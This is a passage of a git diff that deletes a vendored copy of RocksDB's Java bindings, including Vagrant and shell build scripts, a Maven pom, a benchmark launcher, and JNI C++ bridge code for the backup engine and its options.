-  Map<Flag, Object> flags_;
-  // as the scope of a static member equals to the scope of the problem,
-  // we let its c++ pointer to be disposed in its finalizer.
-  static Options defaultOptions_ = new Options();
-  static BlockBasedTableConfig defaultBlockBasedTableOptions_ =
-    new BlockBasedTableConfig();
-  String compressionType_;
-  CompressionType compression_;
-}
diff --git a/thirdparty/rocksdb/java/crossbuild/Vagrantfile b/thirdparty/rocksdb/java/crossbuild/Vagrantfile
deleted file mode 100644
index 4a32177..0000000
--- a/thirdparty/rocksdb/java/crossbuild/Vagrantfile
+++ /dev/null
@@ -1,27 +0,0 @@
-# -*- mode: ruby -*-
-# vi: set ft=ruby :
-
-# Vagrantfile API/syntax version. Don't touch unless you know what you're doing!
-VAGRANTFILE_API_VERSION = "2"
-
-Vagrant.configure(VAGRANTFILE_API_VERSION) do |config|
-
-  config.vm.define "linux32" do |linux32|
-    linux32.vm.box = "hansode/centos-6.7-i386"
-  end
-
-  config.vm.define "linux64" do |linux64|
-    linux64.vm.box = "hansode/centos-6.7-x86_64"
-  end
-
-  config.vm.provider "virtualbox" do |v|
-    v.memory = 2048
-    v.cpus = 4
-    v.customize ["modifyvm", :id, "--nictype1", "virtio" ]
-  end
-
-  config.vm.provision :shell, path: "build-linux-centos.sh"
-  config.vm.synced_folder "../target", "/rocksdb-build"
-  config.vm.synced_folder "../..", "/rocksdb", type: "rsync"
-  config.vm.boot_timeout = 1200
-end
diff --git a/thirdparty/rocksdb/java/crossbuild/build-linux-centos.sh b/thirdparty/rocksdb/java/crossbuild/build-linux-centos.sh
deleted file mode 100755
index 2832eed..0000000
--- a/thirdparty/rocksdb/java/crossbuild/build-linux-centos.sh
+++ /dev/null
@@ -1,32 +0,0 @@
-#!/usr/bin/env bash
-
-set -e
-
-# remove fixed relesever variable present in the hanscode boxes
-sudo rm -f /etc/yum/vars/releasever
-
-# enable EPEL
-sudo yum -y install epel-release
-
-# install all required packages for rocksdb that are available through yum
-sudo yum -y install openssl java-1.7.0-openjdk-devel zlib-devel bzip2-devel lz4-devel snappy-devel libzstd-devel
-
-# install gcc/g++ 4.8.2 from tru/devtools-2
-sudo wget -O /etc/yum.repos.d/devtools-2.repo https://people.centos.org/tru/devtools-2/devtools-2.repo
-sudo yum -y install devtoolset-2-binutils devtoolset-2-gcc devtoolset-2-gcc-c++
-
-# install gflags
-wget https://github.com/gflags/gflags/archive/v2.0.tar.gz -O gflags-2.0.tar.gz
-tar xvfz gflags-2.0.tar.gz; cd gflags-2.0; scl enable devtoolset-2 ./configure; scl enable devtoolset-2 make; sudo make install
-export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/lib
-
-# set java home so we can build rocksdb jars
-export JAVA_HOME=/usr/lib/jvm/java-1.7.0
-
-# build rocksdb
-cd /rocksdb
-scl enable devtoolset-2 'make jclean clean'
-scl enable devtoolset-2 'PORTABLE=1 make rocksdbjavastatic'
-cp /rocksdb/java/target/librocksdbjni-* /rocksdb-build
-cp /rocksdb/java/target/rocksdbjni-* /rocksdb-build
-
diff --git a/thirdparty/rocksdb/java/crossbuild/build-linux.sh b/thirdparty/rocksdb/java/crossbuild/build-linux.sh
deleted file mode 100755
index 48d1c28..0000000
--- a/thirdparty/rocksdb/java/crossbuild/build-linux.sh
+++ /dev/null
@@ -1,14 +0,0 @@
-#!/usr/bin/env bash
-# install all required packages for rocksdb
-sudo apt-get update
-sudo apt-get -y install git make gcc g++ libgflags-dev libsnappy-dev zlib1g-dev libbz2-dev default-jdk
-
-# set java home so we can build rocksdb jars
-export JAVA_HOME=$(echo /usr/lib/jvm/java-7-openjdk*)
-cd /rocksdb
-make jclean clean
-make -j 4 rocksdbjavastatic
-cp /rocksdb/java/target/librocksdbjni-* /rocksdb-build
-cp /rocksdb/java/target/rocksdbjni-* /rocksdb-build
-sudo shutdown -h now
-
diff --git a/thirdparty/rocksdb/java/crossbuild/docker-build-linux-centos.sh b/thirdparty/rocksdb/java/crossbuild/docker-build-linux-centos.sh
deleted file mode 100755
index 44a8bfe..0000000
--- a/thirdparty/rocksdb/java/crossbuild/docker-build-linux-centos.sh
+++ /dev/null
@@ -1,11 +0,0 @@
-#!/usr/bin/env bash
-
-set -e
-
-rm -rf /rocksdb-local
-cp -r /rocksdb-host /rocksdb-local
-cd /rocksdb-local
-scl enable devtoolset-2 'make jclean clean'
-scl enable devtoolset-2 'PORTABLE=1 make rocksdbjavastatic'
-cp java/target/librocksdbjni-linux*.so java/target/rocksdbjni-*-linux*.jar /rocksdb-host/java/target
-
diff --git a/thirdparty/rocksdb/java/jdb_bench.sh b/thirdparty/rocksdb/java/jdb_bench.sh
deleted file mode 100755
index 9665de7..0000000
--- a/thirdparty/rocksdb/java/jdb_bench.sh
+++ /dev/null
@@ -1,10 +0,0 @@
-PLATFORM=64
-if [ `getconf LONG_BIT` != "64" ]
-then
-  PLATFORM=32
-fi
-
-ROCKS_JAR=`find target -name rocksdbjni*.jar`
-
-echo "Running benchmark in $PLATFORM-Bit mode."
-java -server -d$PLATFORM -XX:NewSize=4m -XX:+AggressiveOpts -Djava.library.path=target -cp "${ROCKS_JAR}:benchmark/target/classes" org.rocksdb.benchmark.DbBenchmark $@
diff --git a/thirdparty/rocksdb/java/rocksjni.pom b/thirdparty/rocksdb/java/rocksjni.pom
deleted file mode 100644
index 94f0755..0000000
--- a/thirdparty/rocksdb/java/rocksjni.pom
+++ /dev/null
@@ -1,150 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<project
-        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
-        xmlns="http://maven.apache.org/POM/4.0.0"
-        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
-    <modelVersion>4.0.0</modelVersion>
-    <name>RocksDB JNI</name>
-    <url>http://rocksdb.org/</url>
-    <groupId>org.rocksdb</groupId>
-    <artifactId>rocksdbjni</artifactId>
-    <!-- Version will be automatically replaced -->
-    <version>-</version>
-    <description>RocksDB fat jar that contains .so files for linux32 and linux64, jnilib files
-        for Mac OSX, and a .dll for Windows x64.
-    </description>
-    <licenses>
-        <license>
-            <name>Apache License 2.0</name>
-            <url>http://www.apache.org/licenses/LICENSE-2.0.html</url>
-            <distribution>repo</distribution>
-        </license>
-        <license>
-            <name>GNU General Public License, version 2</name>
-            <url>http://www.gnu.org/licenses/gpl-2.0.html</url>
-            <distribution>repo</distribution>
-        </license>
-    </licenses>
-    <scm>
-        <connection>scm:git:git://github.com/dropwizard/metrics.git</connection>
-        <developerConnection>scm:git:git@github.com:dropwizard/metrics.git</developerConnection>
-        <url>http://github.com/dropwizard/metrics/</url>
-        <tag>HEAD</tag>
-    </scm>
-    <developers>
-        <developer>
-            <name>Facebook</name>
-            <email>help@facebook.com</email>
-            <timezone>America/New_York</timezone>
-            <roles>
-                <role>architect</role>
-            </roles>
-        </developer>
-    </developers>
-
-    <properties>
-        <project.build.source>1.7</project.build.source>
-        <project.build.target>1.7</project.build.target>
-        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
-    </properties>
-
-    <build>
-        <plugins>
-            <plugin>
-                <groupId>org.apache.maven.plugins</groupId>
-                <artifactId>maven-compiler-plugin</artifactId>
-                <version>3.2</version>
-                <configuration>
-                    <source>${project.build.source}</source>
-                    <target>${project.build.target}</target>
-                    <encoding>${project.build.sourceEncoding}</encoding>
-                </configuration>
-            </plugin>
-            <plugin>
-                <groupId>org.apache.maven.plugins</groupId>
-                <artifactId>maven-surefire-plugin</artifactId>
-                <version>2.18.1</version>
-                <configuration>
-                    <argLine>${argLine} -ea -Xcheck:jni -Djava.library.path=${project.build.directory}</argLine>
-                    <useManifestOnlyJar>false</useManifestOnlyJar>  
-                    <useSystemClassLoader>false</useSystemClassLoader>
-                    <additionalClasspathElements>
-                        <additionalClasspathElement>${project.build.directory}/*</additionalClasspathElement>
-                    </additionalClasspathElements>
-                </configuration>
-            </plugin>
-            <plugin>
-                <groupId>org.jacoco</groupId>
-                <artifactId>jacoco-maven-plugin</artifactId>
-                <version>0.7.2.201409121644</version>
-                <executions>
-                    <execution>
-                        <goals>
-                            <goal>prepare-agent</goal>
-                        </goals>
-                    </execution>
-                    <execution>
-                        <id>report</id>
-                        <phase>prepare-package</phase>
-                        <goals>
-                            <goal>report</goal>
-                        </goals>
-                    </execution>
-                </executions>
-            </plugin>
-            <plugin>
-                <groupId>org.codehaus.gmaven</groupId>
-                <artifactId>groovy-maven-plugin</artifactId>
-                <version>2.0</version>
-                <executions>
-                    <execution>
-                        <phase>process-classes</phase>
-                        <goals>
-                            <goal>execute</goal>
-                        </goals>
-                        <configuration>
-                            <defaults>
-                                <name>Xenu</name>
-                            </defaults>
-                            <source>
-                                String fileContents = new File(project.basedir.absolutePath + '/../include/rocksdb/version.h').getText('UTF-8')
-                                matcher = (fileContents =~ /(?s).*ROCKSDB_MAJOR ([0-9]+).*?/)
-                                String major_version = matcher.getAt(0).getAt(1)
-                                matcher = (fileContents =~ /(?s).*ROCKSDB_MINOR ([0-9]+).*?/)
-                                String minor_version = matcher.getAt(0).getAt(1)
-                                matcher = (fileContents =~ /(?s).*ROCKSDB_PATCH ([0-9]+).*?/)
-                                String patch_version = matcher.getAt(0).getAt(1)
-                                String version = String.format('%s.%s.%s', major_version, minor_version, patch_version)
-                                // Set version to be used in pom.properties
-                                project.version = version
-                                // Set version to be set as jar name
-                                project.build.finalName = project.artifactId + "-" + version
-                            </source>
-                        </configuration>
-                    </execution>
-                </executions>
-            </plugin>
-        </plugins>
-    </build>
-
-    <dependencies>
-        <dependency>
-            <groupId>junit</groupId>
-            <artifactId>junit</artifactId>
-            <version>4.12</version>
-            <scope>test</scope>
-        </dependency>
-        <dependency>
-            <groupId>org.assertj</groupId>
-            <artifactId>assertj-core</artifactId>
-            <version>1.7.1</version>
-            <scope>test</scope>
-        </dependency>
-        <dependency>
-            <groupId>org.mockito</groupId>
-            <artifactId>mockito-all</artifactId>
-            <version>1.10.19</version>
-            <scope>test</scope>
-        </dependency>
-    </dependencies>
-</project>
diff --git a/thirdparty/rocksdb/java/rocksjni/backupablejni.cc b/thirdparty/rocksdb/java/rocksjni/backupablejni.cc
deleted file mode 100644
index 28db2b0..0000000
--- a/thirdparty/rocksdb/java/rocksjni/backupablejni.cc
+++ /dev/null
@@ -1,313 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling c++ rocksdb::BackupEnginge and rocksdb::BackupableDBOptions methods
-// from Java side.
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-#include <string>
-#include <vector>
-
-#include "include/org_rocksdb_BackupableDBOptions.h"
-#include "rocksjni/portal.h"
-#include "rocksdb/utilities/backupable_db.h"
-
-///////////////////////////////////////////////////////////////////////////
-// BackupDBOptions
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    newBackupableDBOptions
- * Signature: (Ljava/lang/String;)J
- */
-jlong Java_org_rocksdb_BackupableDBOptions_newBackupableDBOptions(
-    JNIEnv* env, jclass jcls, jstring jpath) {
-  const char* cpath = env->GetStringUTFChars(jpath, nullptr);
-  if(cpath == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return 0;
-  }
-  auto* bopt = new rocksdb::BackupableDBOptions(cpath);
-  env->ReleaseStringUTFChars(jpath, cpath);
-  return reinterpret_cast<jlong>(bopt);
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    backupDir
- * Signature: (J)Ljava/lang/String;
- */
-jstring Java_org_rocksdb_BackupableDBOptions_backupDir(
-    JNIEnv* env, jobject jopt, jlong jhandle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  return env->NewStringUTF(bopt->backup_dir.c_str());
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setBackupEnv
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setBackupEnv(
-    JNIEnv* env, jobject jopt, jlong jhandle, jlong jrocks_env_handle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  auto* rocks_env = reinterpret_cast<rocksdb::Env*>(jrocks_env_handle);
-  bopt->backup_env = rocks_env;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setShareTableFiles
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setShareTableFiles(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean flag) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  bopt->share_table_files = flag;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    shareTableFiles
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_BackupableDBOptions_shareTableFiles(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  return bopt->share_table_files;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setInfoLog
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setInfoLog(
-  JNIEnv* env, jobject jobj, jlong jhandle, jlong jlogger_handle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  auto* sptr_logger =
-      reinterpret_cast<std::shared_ptr<rocksdb::LoggerJniCallback> *>(jhandle);
-  bopt->info_log = sptr_logger->get();
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setSync
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setSync(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean flag) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  bopt->sync = flag;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    sync
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_BackupableDBOptions_sync(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  return bopt->sync;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setDestroyOldData
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setDestroyOldData(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean flag) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  bopt->destroy_old_data = flag;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    destroyOldData
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_BackupableDBOptions_destroyOldData(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  return bopt->destroy_old_data;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setBackupLogFiles
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setBackupLogFiles(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean flag) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  bopt->backup_log_files = flag;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    backupLogFiles
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_BackupableDBOptions_backupLogFiles(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  return bopt->backup_log_files;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setBackupRateLimit
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setBackupRateLimit(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jbackup_rate_limit) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  bopt->backup_rate_limit = jbackup_rate_limit;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    backupRateLimit
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_BackupableDBOptions_backupRateLimit(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  return bopt->backup_rate_limit;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setBackupRateLimiter
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setBackupRateLimiter(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jrate_limiter_handle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  auto* sptr_rate_limiter =
-      reinterpret_cast<std::shared_ptr<rocksdb::RateLimiter> *>(jrate_limiter_handle);
-  bopt->backup_rate_limiter = *sptr_rate_limiter;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setRestoreRateLimit
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setRestoreRateLimit(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jrestore_rate_limit) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  bopt->restore_rate_limit = jrestore_rate_limit;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    restoreRateLimit
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_BackupableDBOptions_restoreRateLimit(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  return bopt->restore_rate_limit;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setRestoreRateLimiter
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setRestoreRateLimiter(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jrate_limiter_handle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  auto* sptr_rate_limiter =
-      reinterpret_cast<std::shared_ptr<rocksdb::RateLimiter> *>(jrate_limiter_handle);
-  bopt->restore_rate_limiter = *sptr_rate_limiter;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setShareFilesWithChecksum
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setShareFilesWithChecksum(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean flag) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  bopt->share_files_with_checksum = flag;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    shareFilesWithChecksum
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_BackupableDBOptions_shareFilesWithChecksum(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  return bopt->share_files_with_checksum;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setMaxBackgroundOperations
- * Signature: (JI)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setMaxBackgroundOperations(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint max_background_operations) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  bopt->max_background_operations =
-      static_cast<int>(max_background_operations);
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    maxBackgroundOperations
- * Signature: (J)I
- */
-jint Java_org_rocksdb_BackupableDBOptions_maxBackgroundOperations(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  return static_cast<jint>(bopt->max_background_operations);
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setCallbackTriggerIntervalSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setCallbackTriggerIntervalSize(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jcallback_trigger_interval_size) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  bopt->callback_trigger_interval_size =
-      static_cast<uint64_t>(jcallback_trigger_interval_size);
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    callbackTriggerIntervalSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_BackupableDBOptions_callbackTriggerIntervalSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  return static_cast<jlong>(bopt->callback_trigger_interval_size);
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_BackupableDBOptions_disposeInternal(
-    JNIEnv* env, jobject jopt, jlong jhandle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  assert(bopt != nullptr);
-  delete bopt;
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/backupenginejni.cc b/thirdparty/rocksdb/java/rocksjni/backupenginejni.cc
deleted file mode 100644
index 004de97..0000000
--- a/thirdparty/rocksdb/java/rocksjni/backupenginejni.cc
+++ /dev/null
@@ -1,236 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling C++ rocksdb::BackupEngine methods from the Java side.
-
-#include <jni.h>
-#include <vector>
-
-#include "include/org_rocksdb_BackupEngine.h"
-#include "rocksdb/utilities/backupable_db.h"
-#include "rocksjni/portal.h"
-
-/*
- * Class:     org_rocksdb_BackupEngine
- * Method:    open
- * Signature: (JJ)J
- */
-jlong Java_org_rocksdb_BackupEngine_open(
-    JNIEnv* env, jclass jcls, jlong env_handle,
-    jlong backupable_db_options_handle) {
-  auto* rocks_env = reinterpret_cast<rocksdb::Env*>(env_handle);
-  auto* backupable_db_options =
-      reinterpret_cast<rocksdb::BackupableDBOptions*>(
-      backupable_db_options_handle);
-  rocksdb::BackupEngine* backup_engine;
-  auto status = rocksdb::BackupEngine::Open(rocks_env,
-      *backupable_db_options, &backup_engine);
-
-  if (status.ok()) {
-    return reinterpret_cast<jlong>(backup_engine);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, status);
-    return 0;
-  }
-}
-
-/*
- * Class:     org_rocksdb_BackupEngine
- * Method:    createNewBackup
- * Signature: (JJZ)V
- */
-void Java_org_rocksdb_BackupEngine_createNewBackup(
-    JNIEnv* env, jobject jbe, jlong jbe_handle, jlong db_handle,
-    jboolean jflush_before_backup) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(db_handle);
-  auto* backup_engine = reinterpret_cast<rocksdb::BackupEngine*>(jbe_handle);
-  auto status = backup_engine->CreateNewBackup(db,
-      static_cast<bool>(jflush_before_backup));
-
-  if (status.ok()) {
-    return;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, status);
-}
-
-/*
- * Class:     org_rocksdb_BackupEngine
- * Method:    getBackupInfo
- * Signature: (J)Ljava/util/List;
- */
-jobject Java_org_rocksdb_BackupEngine_getBackupInfo(
-    JNIEnv* env, jobject jbe, jlong jbe_handle) {
-  auto* backup_engine = reinterpret_cast<rocksdb::BackupEngine*>(jbe_handle);
-  std::vector<rocksdb::BackupInfo> backup_infos;
-  backup_engine->GetBackupInfo(&backup_infos);
-  return rocksdb::BackupInfoListJni::getBackupInfo(env, backup_infos);
-}
-
-/*
- * Class:     org_rocksdb_BackupEngine
- * Method:    getCorruptedBackups
- * Signature: (J)[I
- */
-jintArray Java_org_rocksdb_BackupEngine_getCorruptedBackups(
-    JNIEnv* env, jobject jbe, jlong jbe_handle) {
-  auto* backup_engine = reinterpret_cast<rocksdb::BackupEngine*>(jbe_handle);
-  std::vector<rocksdb::BackupID> backup_ids;
-  backup_engine->GetCorruptedBackups(&backup_ids);
-  // store backupids in int array
-  std::vector<jint> int_backup_ids(backup_ids.begin(), backup_ids.end());
-  
-  // Store ints in java array
-  // Its ok to loose precision here (64->32)
-  jsize ret_backup_ids_size = static_cast<jsize>(backup_ids.size());
-  jintArray ret_backup_ids = env->NewIntArray(ret_backup_ids_size);
-  if(ret_backup_ids == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-  env->SetIntArrayRegion(ret_backup_ids, 0, ret_backup_ids_size,
-      int_backup_ids.data());
-  return ret_backup_ids;
-}
-
-/*
- * Class:     org_rocksdb_BackupEngine
- * Method:    garbageCollect
- * Signature: (J)V
- */
-void Java_org_rocksdb_BackupEngine_garbageCollect(
-    JNIEnv* env, jobject jbe, jlong jbe_handle) {
-  auto* backup_engine = reinterpret_cast<rocksdb::BackupEngine*>(jbe_handle);
-  auto status = backup_engine->GarbageCollect();
-
-  if (status.ok()) {
-    return;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, status);
-}
-
-/*
- * Class:     org_rocksdb_BackupEngine
- * Method:    purgeOldBackups
- * Signature: (JI)V
- */
-void Java_org_rocksdb_BackupEngine_purgeOldBackups(
-    JNIEnv* env, jobject jbe, jlong jbe_handle, jint jnum_backups_to_keep) {
-  auto* backup_engine = reinterpret_cast<rocksdb::BackupEngine*>(jbe_handle);
-  auto status =
-      backup_engine->
-          PurgeOldBackups(static_cast<uint32_t>(jnum_backups_to_keep));
-
-  if (status.ok()) {
-    return;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, status);
-}
-
-/*
- * Class:     org_rocksdb_BackupEngine
- * Method:    deleteBackup
- * Signature: (JI)V
- */
-void Java_org_rocksdb_BackupEngine_deleteBackup(
-    JNIEnv* env, jobject jbe, jlong jbe_handle, jint jbackup_id) {
-  auto* backup_engine = reinterpret_cast<rocksdb::BackupEngine*>(jbe_handle);
-  auto status =
-      backup_engine->DeleteBackup(static_cast<rocksdb::BackupID>(jbackup_id));
-
-  if (status.ok()) {
-    return;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, status);
-}
-
-/*
- * Class:     org_rocksdb_BackupEngine
- * Method:    restoreDbFromBackup
- * Signature: (JILjava/lang/String;Ljava/lang/String;J)V
- */
-void Java_org_rocksdb_BackupEngine_restoreDbFromBackup(
-    JNIEnv* env, jobject jbe, jlong jbe_handle, jint jbackup_id,
-    jstring jdb_dir, jstring jwal_dir, jlong jrestore_options_handle) {
-  auto* backup_engine = reinterpret_cast<rocksdb::BackupEngine*>(jbe_handle);
-  const char* db_dir = env->GetStringUTFChars(jdb_dir, nullptr);
-  if(db_dir == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-  const char* wal_dir = env->GetStringUTFChars(jwal_dir, nullptr);
-  if(wal_dir == nullptr) {
-    // exception thrown: OutOfMemoryError
-    env->ReleaseStringUTFChars(jdb_dir, db_dir);
-    return;
-  }
-  auto* restore_options =
-      reinterpret_cast<rocksdb::RestoreOptions*>(jrestore_options_handle);
-  auto status =
-      backup_engine->RestoreDBFromBackup(
-          static_cast<rocksdb::BackupID>(jbackup_id), db_dir, wal_dir,
-          *restore_options);
-
-  env->ReleaseStringUTFChars(jwal_dir, wal_dir);
-  env->ReleaseStringUTFChars(jdb_dir, db_dir);
-
-  if (status.ok()) {
-    return;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, status);
-}
-
-/*
- * Class:     org_rocksdb_BackupEngine
- * Method:    restoreDbFromLatestBackup
- * Signature: (JLjava/lang/String;Ljava/lang/String;J)V
- */
-void Java_org_rocksdb_BackupEngine_restoreDbFromLatestBackup(
-    JNIEnv* env, jobject jbe, jlong jbe_handle, jstring jdb_dir,
-    jstring jwal_dir, jlong jrestore_options_handle) {
-  auto* backup_engine = reinterpret_cast<rocksdb::BackupEngine*>(jbe_handle);
-  const char* db_dir = env->GetStringUTFChars(jdb_dir, nullptr);
-  if(db_dir == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-  const char* wal_dir = env->GetStringUTFChars(jwal_dir, nullptr);
-  if(wal_dir == nullptr) {
-    // exception thrown: OutOfMemoryError
-    env->ReleaseStringUTFChars(jdb_dir, db_dir);
-    return;
-  }
-  auto* restore_options =
-      reinterpret_cast<rocksdb::RestoreOptions*>(jrestore_options_handle);
-  auto status =
-      backup_engine->RestoreDBFromLatestBackup(db_dir, wal_dir,
-          *restore_options);
-
-  env->ReleaseStringUTFChars(jwal_dir, wal_dir);
-  env->ReleaseStringUTFChars(jdb_dir, db_dir);
-
-  if (status.ok()) {
-    return;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, status);
-}
-
-/*
- * Class:     org_rocksdb_BackupEngine
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_BackupEngine_disposeInternal(
-    JNIEnv* env, jobject jbe, jlong jbe_handle) {
-  auto* be = reinterpret_cast<rocksdb::BackupEngine*>(jbe_handle);
-  assert(be != nullptr);
-  delete be;
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/cassandra_compactionfilterjni.cc b/thirdparty/rocksdb/java/rocksjni/cassandra_compactionfilterjni.cc
deleted file mode 100644
index 9d77559..0000000
